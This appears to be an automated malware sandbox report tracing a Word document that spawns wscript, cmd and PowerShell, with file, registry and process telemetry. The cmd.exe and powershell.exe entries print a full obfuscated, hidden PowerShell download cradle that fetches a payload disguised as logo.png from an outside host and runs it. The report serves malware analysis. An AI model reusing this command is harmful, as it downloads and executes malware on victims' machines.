Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 1661536 True 1
Fn
System (67)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:31 (UTC) True 1
Fn
Get Time type = Ticks, time = 159058 True 1
Fn
Get Time type = Performance Ctr, time = 21336999126 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:32 (UTC) True 3
Fn
Get Time type = Ticks, time = 160103 True 1
Fn
Get Time type = Performance Ctr, time = 21442374941 True 1
Fn
Get Time type = Ticks, time = 160119 True 2
Fn
Get Time type = Ticks, time = 160166 True 1
Fn
Get Time type = Performance Ctr, time = 21448825820 True 1
Fn
Get Time type = Ticks, time = 160384 True 1
Fn
Get Time type = Performance Ctr, time = 21470557661 True 1
Fn
Get Time type = Ticks, time = 162085 True 1
Fn
Get Time type = Ticks, time = 162100 True 7
Fn
Get Time type = Ticks, time = 162116 True 12
Fn
Get Time type = Ticks, time = 162537 True 8
Fn
Get Time type = Ticks, time = 162553 True 4
Fn
Get Time type = Ticks, time = 162568 True 4
Fn
Get Time type = Ticks, time = 162880 True 3
Fn
Get Time type = Ticks, time = 162896 True 1
Fn
Get Time type = Ticks, time = 162911 True 1
Fn
Get Time type = Ticks, time = 163145 True 3
Fn
Get Info type = Operating System True 4
Fn
Get Info type = System Directory, result_out = lô/ True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #26: cmd.exe
61 0
»
Information Value
ID #26
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:30, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:55
OS Process Information
»
Information Value
PID 0x4fc
Parent PID 0xb14 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B5C
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:34 (UTC) True 1
Fn
Get Time type = Ticks, time = 162615 True 1
Fn
Get Time type = Performance Ctr, time = 21692816071 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #27: powershell.exe
294 0
»
Information Value
ID #27
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:32, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:52
OS Process Information
»
Information Value
PID 0xc4
Parent PID 0x4fc (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 614
0x 908
0x 5C8
0x B98
0x 820
0x 40C
0x D08
Host Behavior
File (44)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 4
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 3
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (96)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key PowerShell - False 1
Fn
Open Key Windows PowerShell - True 1
Fn
Open Key Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (69)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 63
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #28: wscript.exe
134 0
»
Information Value
ID #28
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:33, Reason: Child Process
Unmonitor End Time: 00:01:40, Reason: Self Terminated
Monitor Duration 00:00:07
OS Process Information
»
Information Value
PID 0xa34
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 358
0x 364
0x 110
0x 858
0x 77C
0x B84
0x 884
0x A04
0x B0C
0x 184
Host Behavior
COM (2)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (2)
»
Operation Filename Additional Information Success Count Logfile
Get Info - type = size True 1
Fn
Read - size = 19304, size_out = 19304 True 1
Fn
Data
Registry (28)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 176, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Module (9)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff6b0000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 4348512 True 1
Fn
System (62)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:36 (UTC) True 1
Fn
Get Time type = Ticks, time = 163957 True 1
Fn
Get Time type = Performance Ctr, time = 21827101820 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:38 (UTC) True 3
Fn
Get Time type = Ticks, time = 165907 True 1
Fn
Get Time type = Performance Ctr, time = 22022684921 True 1
Fn
Get Time type = Ticks, time = 166499 True 2
Fn
Get Time type = Performance Ctr, time = 22084418337 True 1
Fn
Get Time type = Performance Ctr, time = 22085446395 True 1
Fn
Get Time type = Ticks, time = 166905 True 1
Fn
Get Time type = Ticks, time = 166921 True 5
Fn
